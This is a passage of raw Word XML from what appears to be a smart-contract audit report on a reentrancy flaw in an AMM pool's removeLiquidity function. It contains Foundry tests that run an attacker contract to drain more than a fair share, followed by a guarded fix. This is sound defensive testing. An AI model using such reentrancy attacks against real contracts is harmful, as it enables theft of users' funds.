    <w:p w14:paraId="3C67CB87"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try attacker.attack(10 ether) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7CC16"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uint256 balAfter = tokenA.balanceOf(address(attacker));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D6439"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assertGt(balAfter, balBefore + 10 ether, "attacker withdrew more than fair share");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DABEB0"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assertGt(attacker.reenterCount(), 0, "reentrancy path executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D259EE"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 catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0B9D5"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 If hooks unavailable, document direct ETH-style variant separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275E6F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202A4941"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020C41D" w14:textId="11490CF2" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C1A94" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Recommendation — fixed contract (current AMMPool pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A73441" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>function removeLiquidity(uint256 liquidity, uint256 amountAMin, uint256 amountBMin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C778E"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external</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D36989"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nonReentrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59849CA3"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returns (uint256 amountA, uint256 amountB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79FA52" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15850537"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if (liquidity == 0) revert ZeroAmount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25D843" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E64E8A"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uint256 totalLp = lpToken.totalSupply();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FF9EB"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amountA = (liquidity * reserveA) / totalLp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30039AE4"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amountB = (liquidity * reserveB) / totalLp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559F399" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E2F519"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if (amountA &lt; amountAMin || amountB &lt; amountBMin) revert InsufficientLiquidity();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1829E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555CCCA0"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 EFFECTS before INTERACTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422FF2C"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lpToken.burn(msg.sender, liquidity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA42E27"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reserveA -= amountA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B489E"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reserveB -= amountB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D7C97" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53516041"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_transferOut(tokenA, msg.sender, amountA);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E68EAD"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_transferOut(tokenB, msg.sender, amountB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC86B8" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C9350E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    emit Burn(msg.sender, amountA, amountB, liquidity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37709455" w14:textId="0A054FCD" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9E896" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E4A410E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Foundry test — attack reverts on fixed pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF157F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>// SPDX-License-Identifier: MIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A85B6A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>pragma solidity ^0.8.24;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7C6C7" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65218EE4" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {Test} from "forge-std/Test.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373AF6C" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {AMMPool} from "../../contracts/amm/AMMPool.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D9FF9" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {MockERC20} from "../../contracts/mocks/MockERC20.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438ECFD9" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {ReentrancyAttackerFixed} from "../mocks/ReentrancyAttackerFixed.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8A11B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D96A84" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>contract AMMPoolReentrancyFixedTest is Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D81E65" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    MockERC20 tokenA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12FDBC" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    MockERC20 tokenB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9CBE22" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    AMMPool pool;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36F7F7" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D3A1DD" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    function setUp() public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF55AAD" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        tokenA = new MockERC20("A", "A");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A46BF4" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        tokenB = new MockERC20("B", "B");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE1F98" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        pool = new AMMPool(address(tokenA), address(tokenB), address(this));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EEDA7" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        // seed liquidity via addLiquidity in full test suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FD491" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5AA1A9" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DEAC57" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    function test_reentrancy_reverts_on_fixed_pool()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF881DA" w14:textId="0804F2AE" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A372D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        ReentrancyAttackerFixed attacker = new ReentrancyAttackerFixed(address(pool));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52438EEA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        vm.expectRevert(); // ReentrancyGuard or CEI prevents second withdrawal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE917C" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        attacker.attack(1 ether);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AFF9CC" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F33FDE" w14:textId="110EBFFC" w:rsidR="00707638" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51826A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641E29DC" w14:textId="77777777" w:rsidR="00707638" w:rsidRPr="00707638" w:rsidRDefault="00707638" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
